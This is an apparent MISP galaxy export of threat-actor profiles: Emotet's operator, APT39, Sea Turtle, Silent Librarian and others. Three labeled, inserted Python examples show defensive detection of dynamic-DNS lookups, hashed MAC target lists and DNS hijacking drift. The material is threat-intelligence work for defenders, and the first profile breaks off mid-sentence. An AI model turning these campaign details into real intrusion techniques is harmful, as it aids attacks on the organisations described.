MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10-month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016, but the latest variant is not deploying a banking Trojan module with web injects; it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients, and provide a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MUMMY SPIDER.
Known Synonyms |
---|
GOLD CRESTWOOD |
TA542 |
Internal MISP references
UUID c93281be-f6cd-4cd0-a5a3-defde9d77d8b
which can be used as unique global reference for MUMMY SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-crestwood - webarchive
Associated metadata
Metadata key | Value |
---|---|
STARDUST CHOLLIMA
Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been publicly reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.
Internal MISP references
UUID d8e1762a-0063-48c2-9ea1-8d176d14b70f
which can be used as unique global reference for STARDUST CHOLLIMA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cold River
In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cold River.
Known Synonyms |
---|
Nahr Elbard |
Nahr el bared |
Internal MISP references
UUID 7d99d2f7-adf0-44e4-9044-d18ff6842a16
which can be used as unique global reference for Cold River
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Silence group
Group-IB has exposed the attacks committed by the Silence cybercriminal group, a relatively new threat actor that’s been operating since mid-2016. While the gang had previously targeted Russian banks, Group-IB experts have also discovered evidence of the group's activity in more than 25 countries worldwide. Group-IB has published its first detailed report on the tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their command language, the location of the infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan), although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silence group.
Known Synonyms |
---|
Silence |
WHISPER SPIDER |
Internal MISP references
UUID 0d5e17fd-7a71-47fd-b4bc-867cdb833726
which can be used as unique global reference for Silence group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
spoken-language | ['rus'] |
APT39
APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT39.
Known Synonyms |
---|
COBALT HICKMAN |
Chafer |
G0087 |
REMIX KITTEN |
Radio Serpens |
TA454 |
Internal MISP references
UUID c2c64bd3-a325-446f-91a8-b4c0f173a30b
which can be used as unique global reference for APT39
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html - webarchive
- https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - webarchive
- https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/ - webarchive
- https://securelist.com/chafer-used-remexi-malware/89538/ - webarchive
- https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets - webarchive
- https://attack.mitre.org/groups/G0087/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-hickman - webarchive
- https://unit42.paloaltonetworks.com/atoms/radioserpens/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Siesta
FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.
Internal MISP references
UUID 27c97181-b8e9-43e1-93c0-f953cac45326
which can be used as unique global reference for Siesta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gallmaker
Symantec researchers have uncovered a previously unknown attack group that is targeting government and military targets, including several overseas embassies of an Eastern European country, and military and defense targets in the Middle East. This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign. The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018.
Internal MISP references
UUID c79dab01-3f9f-491e-8a5f-6423339c9f76
which can be used as unique global reference for Gallmaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BOSS SPIDER
Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BOSS SPIDER.
Known Synonyms |
---|
GOLD LOWELL |
Internal MISP references
UUID d6a13387-4c98-4a0c-a516-6c36c081b64c
which can be used as unique global reference for BOSS SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-lowell - webarchive
- https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit - webarchive
- https://www.secureworks.com/blog/samas-ransomware - webarchive
- https://www.secureworks.com/blog/ransomware-deployed-by-adversary - webarchive
- https://www.secureworks.com/research/samsam-ransomware-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
PINCHY SPIDER
First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER sells access to GandCrab under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the affiliate), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.
Internal MISP references
UUID 80f07c15-cad3-44a2-a8a4-dd14490b5117
which can be used as unique global reference for PINCHY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GURU SPIDER
Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.
Internal MISP references
UUID 0a667713-bc31-4a72-9ea3-34fc094a9dde
which can be used as unique global reference for GURU SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SALTY SPIDER
Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.
Internal MISP references
UUID 7e37be6b-5a94-45f3-bdeb-f494c520eee3
which can be used as unique global reference for SALTY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NOMAD PANDA
In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.
Internal MISP references
UUID 4b7df353-fbcc-4f00-a54f-5121c5edb9be
which can be used as unique global reference for NOMAD PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Flash Kitten
This suspected Iran-based adversary conducted long-running strategic web compromise (SWC) campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, FLASH KITTEN's target scope appears to be focused on the MENA region.
Internal MISP references
UUID 6e899dd4-f95e-42a0-a5a3-e57249f017cf
which can be used as unique global reference for Flash Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TINY SPIDER
According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.
Internal MISP references
UUID 89a05f9f-a6dc-4426-8c15-a8d5ef6d8524
which can be used as unique global reference for TINY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LUNAR SPIDER
According to CrowdStrike, this actor is using BokBot/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. LUNAR SPIDER is reportedly associated with GRIM SPIDER and WIZARD SPIDER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LUNAR SPIDER.
Known Synonyms |
---|
GOLD SWATHMORE |
Internal MISP references
UUID 0db4c708-f33d-4d46-906d-12fdf7415f62
which can be used as unique global reference for LUNAR SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/ - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
Associated metadata
Metadata key | Value |
---|---|
RATPAK SPIDER
In July 2018, the source code of Pegasus, RATPAK SPIDER's malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia's financial sector. Associated malware, Buhtrap, which had been leaked previously, was observed in 2018 in connection with strategic web compromise (SWC) campaigns that also targeted Russian users.
Internal MISP references
UUID ec3fda76-8c1c-4019-8109-3f92e6b15633
which can be used as unique global reference for RATPAK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Kabar Cobra
Internal MISP references
UUID 9ba291f2-b107-402d-9083-3128395ff26e
which can be used as unique global reference for Operation Kabar Cobra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT-C-36
Since April 2018, an APT group (Blind Eagle, APT-C-36), suspected to originate from South America, has carried out continuous targeted attacks against Colombian government institutions as well as major corporations in the financial sector, the petroleum industry, professional manufacturing and other sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-36.
Known Synonyms |
---|
Blind Eagle |
Internal MISP references
UUID ae1c64ff-5a37-4291-97f8-ea402c63efd0
which can be used as unique global reference for APT-C-36
in MISP communities and other software using the MISP galaxy
External references
- https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/ - webarchive
- https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf - webarchive
- https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia - webarchive
- https://lab52.io/blog/apt-c-36-recent-activity-analysis/ - webarchive
- https://www.trendmicro.com/en_ph/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/ - webarchive
- https://attack.mitre.org/groups/G0099/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ecuador', 'Colombia', 'Spain', 'Panama', 'Chile'] |
cfr-target-category | ['Petroleum', 'Manufacturing', 'Financial', 'Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
IRIDIUM
Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States).
Internal MISP references
UUID 29cfe970-5446-4cfc-a2da-00e9f49e02ba
which can be used as unique global reference for IRIDIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986 - webarchive
- https://threatpost.com/ranian-apt-6tb-data-citrix/142688/ - webarchive
- https://hub.packtpub.com/resecurity-reports-iriduim-behind-citrix-data-breach-200-government-agencies-oil-and-gas-companies-and-technology-companies-also-targeted/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 10 |
country | IR |
SandCat
SandCat is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December 2018 (CVE-2018-8611) had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed in 2018 by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which were zero-days when Microsoft released fixes.
Internal MISP references
UUID dc15f388-a353-4185-b28e-015745f708ba
which can be used as unique global reference for SandCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Comando
Operation Comando is a pure cybercrime campaign, possibly of Brazilian origin, with a concrete and persistent focus on the hospitality sector; it shows how a threat actor can succeed in pursuing its objectives on a minimal budget. The use of dynamic DNS (DDNS) services, publicly available remote access tools and minimal software development knowledge (in this case VB.NET) has been enough to run a campaign lasting months and potentially gather credit card information and other data.
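The DDNS-plus-commodity-RAT pattern described above is cheap for the attacker, but it also leaves a simple signal in DNS query logs. The following is an added example, not code from the original research or from the MISP galaxy: it flags lookups to dynamic-DNS zones in a query log and ranks the clients making them. The log format, the client addresses, the host names and the provider list are all constructed for illustration; a real deployment would pull the zone list from a maintained source.

```python
import re
from collections import Counter

# Constructed list of second-level zones run by dynamic-DNS providers. Treat it
# as illustrative: in production this comes from a maintained list, not a constant.
DDNS_ZONES = frozenset({
    "duckdns.org", "no-ip.org", "no-ip.biz", "hopto.org", "zapto.org",
    "ddns.net", "dynu.com", "myftp.biz", "serveftp.com", "sytes.net",
})

# Constructed log format: "<timestamp> <client-ip> query <qtype> <qname>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$"
)


def ddns_zone(qname):
    """Return the dynamic-DNS zone that qname falls under, or None.

    The name is lower-cased and the trailing dot removed so that
    'UPDATE-SRV.Sytes.NET.' and 'update-srv.sytes.net' are treated alike.
    Suffixes are tested from the TLD upward, so 'a.b.hopto.org' matches 'hopto.org'.
    """
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels) - 1, -1, -1):
        suffix = ".".join(labels[i:])
        if suffix in DDNS_ZONES:
            return suffix
    return None


def find_ddns_lookups(log_lines):
    """Parse the log and return (timestamp, client, qname, zone) for each hit.

    Lines that do not match the expected format are skipped, not fatal: a
    detection script that dies on one odd line misses everything after it.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        zone = ddns_zone(m["qname"])
        if zone is not None:
            hits.append((m["ts"], m["client"], m["qname"].rstrip(".").lower(), zone))
    return hits


def clients_by_hits(hits):
    """Count hits per client so the noisiest hosts surface first for triage."""
    return Counter(client for _, client, _, _ in hits)


# Constructed sample log; the names and addresses are not real indicators.
SAMPLE_LOG = [
    "2019-03-05T10:12:01Z 10.0.5.23 query A hotel-frontdesk.duckdns.org.",
    "2019-03-05T10:12:03Z 10.0.5.23 query A www.example.com.",
    "2019-03-05T10:14:41Z 10.0.5.23 query A pms-backup.hopto.org.",
    "2019-03-05T10:15:00Z 10.0.7.8 query AAAA mail.example.org.",
    "2019-03-05T10:20:17Z 10.0.7.8 query A UPDATE-SRV.Sytes.NET",
    "this line is not a query record and is skipped",
]

if __name__ == "__main__":
    hits = find_ddns_lookups(SAMPLE_LOG)
    for ts, client, qname, zone in hits:
        print(f"{ts} {client} -> {qname} (dynamic-DNS zone: {zone})")
    for client, n in clients_by_hits(hits).most_common():
        print(f"{client}: {n} dynamic-DNS lookup(s)")
```

Dynamic DNS has legitimate users, so treat a hit as a triage lead rather than an alert on its own: the useful signal is a point-of-sale or front-desk host making repeated lookups to such zones, which is then correlated with the remote-access tool the text mentions running on that host.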
Internal MISP references
UUID 35c40ce2-57c0-479e-8a56-efbb8695e395
which can be used as unique global reference for Operation Comando
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT-C-27
A threat actor active since at least November 2014. This group has launched long-term attacks against organizations in the Syrian region using Android and Windows malware. Its objective is the theft of sensitive information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-27.
Known Synonyms |
---|
ATK80 |
GoldMouse |
Golden RAT |
Internal MISP references
UUID ee7f535d-cc3e-40f3-99f3-c97963cfa250
which can be used as unique global reference for APT-C-27
in MISP communities and other software using the MISP galaxy
External references
- https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-apt-c-27/ - webarchive
- https://web.archive.org/web/20180827024318/http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | SY |
since | 2014 |
suspected-victims | ['Middle East', 'Syria'] |
Operation ShadowHammer
Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.
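Selective targeting by hardware address, as described above, is a run-time check inside the implant: it enumerates the host's adapters and compares them with the embedded list. The following is an added example and not code from Kaspersky or from the MISP galaxy; it shows how a defender can run the same comparison against a published target list. Two assumptions are labelled in the code: that the list carries MD5 hashes of the MAC addresses rather than the addresses themselves (the text above only speaks of MAC addresses; the hashed form is my reading of the public analysis), and that the hashed string is the upper-case, colon-separated form. The two target hashes are derived from made-up addresses, not taken from the real samples.

```python
import hashlib
import re
import uuid

HEX12 = re.compile(r"^[0-9A-Fa-f]{12}$")


def normalize_mac(mac):
    """Return mac in canonical 'AA:BB:CC:DD:EE:FF' form.

    Accepts ':' and '-' separators, Cisco-style 'aabb.ccdd.eeff' and bare hex.
    Raises ValueError for anything that is not exactly 48 bits of hex, so a
    caller cannot silently compare the hash of garbage.
    """
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if not HEX12.match(digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    digits = digits.upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def mac_hash(mac):
    """MD5 of the canonical MAC string (assumed list format, see lead-in)."""
    return hashlib.md5(normalize_mac(mac).encode("ascii")).hexdigest()


# Constructed target list: hashes of two made-up addresses. Hashing lets an
# implant carry its victim list without exposing the addresses in plaintext.
TARGET_HASHES = frozenset({
    mac_hash("00:11:22:33:44:55"),
    mac_hash("AA-BB-CC-DD-EE-FF"),
})


def matching_adapters(macs, target_hashes=TARGET_HASHES):
    """Return the canonical MACs from `macs` whose hash is in the target list.

    Entries that do not parse are skipped so one odd line of `ip link` or
    `getmac` output does not abort the whole check.
    """
    hits = []
    for mac in macs:
        try:
            canonical = normalize_mac(mac)
        except ValueError:
            continue
        if hashlib.md5(canonical.encode("ascii")).hexdigest() in target_hashes:
            hits.append(canonical)
    return hits


def local_macs():
    """Best-effort local adapter list via uuid.getnode().

    It yields a single address (a random one if no hardware MAC is found), so
    for a real sweep feed matching_adapters() the parsed output of `ip link`
    or `getmac` instead.
    """
    return ["%012X" % uuid.getnode()]


if __name__ == "__main__":
    found = matching_adapters(local_macs())
    print("targeted adapter(s):", found if found else "none")
```

The normalization step is the part that goes wrong in practice: the same adapter is reported as `00-11-22-33-44-55` by Windows tools, `00:11:22:33:44:55` by Linux and `0011.2233.4455` by some network gear, and a hash of the wrong form never matches. Fix the form first, then hash.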
Internal MISP references
UUID 401c30c7-4317-458a-9b0a-379a44d63457
which can be used as unique global reference for Operation ShadowHammer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Whitefly
In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.
Internal MISP references
UUID 943f490e-ac7f-40fe-b6f3-33e2623649d2
which can be used as unique global reference for Whitefly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sea Turtle
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have in the internet. That trust and the stability of the DNS system as a whole drive the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.
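The manipulation described above happens at the registrar or registry: the attacker changes the NS or A records for a victim's domain so that mail or VPN traffic terminates at a host they control. The defender's counterpart is to watch those records for drift against a known-good baseline. The following is an added example, not code from Talos or from the MISP galaxy. The baseline, the trusted address range and the two resolver snapshots are constructed; the `.example` zone names and the 198.51.100.0/24 and 203.0.113.0/24 ranges are documentation values, not real indicators.

```python
import ipaddress

# Constructed baseline: what each name should resolve to, per record type, plus
# the address space the organisation actually controls. Keep the real thing in a
# signed inventory, not in a script constant.
BASELINE = {
    "example.org": {
        "NS": {"ns1.example.org", "ns2.example.org"},
        "A": {"198.51.100.10"},
        "MX": {"mail.example.org"},
    },
    "mail.example.org": {"A": {"198.51.100.25"}},
}
TRUSTED_NETS = [ipaddress.ip_network("198.51.100.0/24")]


def check_name(name, observed, baseline=BASELINE, trusted=TRUSTED_NETS):
    """Compare one name's observed records with the baseline.

    observed: {rtype: iterable of values} as returned by a resolver.
    Returns a list of (severity, message). An NS change is rated high because
    control of the delegation lets the attacker mint any record (and obtain
    certificates) at will; an A record outside the trusted ranges is rated high
    even when the baseline itself might be stale.
    """
    expected = baseline.get(name)
    if expected is None:
        return [("info", f"{name}: no baseline, cannot judge")]
    findings = []
    for rtype, want in expected.items():
        got = set(observed.get(rtype, ()))
        if got != want:
            severity = "high" if rtype == "NS" else "medium"
            findings.append((severity,
                             f"{name} {rtype}: added {sorted(got - want)}, "
                             f"removed {sorted(want - got)}"))
    for ip in observed.get("A", ()):
        if not any(ipaddress.ip_address(ip) in net for net in trusted):
            findings.append(("high", f"{name} A {ip}: outside trusted address space"))
    return findings


def check_snapshot(snapshot, **kwargs):
    """Run check_name over a {name: {rtype: [values]}} snapshot from one resolver."""
    findings = []
    for name, records in snapshot.items():
        findings.extend(check_name(name, records, **kwargs))
    return findings


# Constructed snapshot of a healthy zone.
CLEAN = {
    "example.org": {
        "NS": ["ns1.example.org", "ns2.example.org"],
        "A": ["198.51.100.10"],
        "MX": ["mail.example.org"],
    },
    "mail.example.org": {"A": ["198.51.100.25"]},
}

# Constructed snapshot after a registrar-level hijack: delegation moved to the
# attacker's name servers and the web and mail hosts now point at a MitM box.
HIJACKED = {
    "example.org": {
        "NS": ["ns1.hijack.example", "ns2.hijack.example"],
        "A": ["203.0.113.7"],
        "MX": ["mail.example.org"],
    },
    "mail.example.org": {"A": ["203.0.113.7"]},
}

if __name__ == "__main__":
    for label, snap in (("clean", CLEAN), ("hijacked", HIJACKED)):
        print(f"--- {label} ---")
        for severity, message in check_snapshot(snap) or [("ok", "no drift")]:
            print(f"[{severity}] {message}")
```

Feed it snapshots from more than one vantage point (your own authoritative servers and several public recursive resolvers) on a short interval, since record changes in operations of this kind can be reverted once the attacker has what they came for. The check is a detective control; the preventive ones sit with the registrar and registry (registry lock, MFA on the registrar account) and with DNSSEC on the zone.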
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sea Turtle.
Known Synonyms |
---|
COSMIC WOLF |
Marbled Dust |
SILICON |
Teal Kurma |
UNC1326 |
Internal MISP references
UUID ce7bba52-5ae8-44ea-9979-68502d832ab7
which can be used as unique global reference for Sea Turtle
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2019/04/seaturtle.html - webarchive
- https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming - webarchive
- https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X - webarchive
- https://icann.zoom.us/recording/play/AhQB4AQyjCuEJGz2wQQans0Xqkz3su8swGLQoORJhdECw9ttz0TbuyzBlue85gIY - webarchive
- https://community.icann.org/download/attachments/109483867/Cybersecurity%20and%20the%20ICANN%20Ecosystem.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2022GTR.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi?id=101738 - webarchive
- https://threatintel.eu/2020/02/25/on-sea-turtle-campaign-targeting-greek-governmental-organisations-timeline - webarchive
- https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf - webarchive
- https://www.youtube.com/watch?v=ws1k44ZhJ3g - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | TR |
Silent Librarian
Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late 2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silent Librarian.
Known Synonyms |
---|
COBALT DICKENS |
Mabna Institute |
TA407 |
TA4900 |
Yellow Nabu |
Internal MISP references
UUID 5059b44d-2753-4977-b987-4922f09afe6b
which can be used as unique global reference for Silent Librarian
in MISP communities and other software using the MISP galaxy
External references
- https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment - webarchive
- https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment - webarchive
- https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic - webarchive
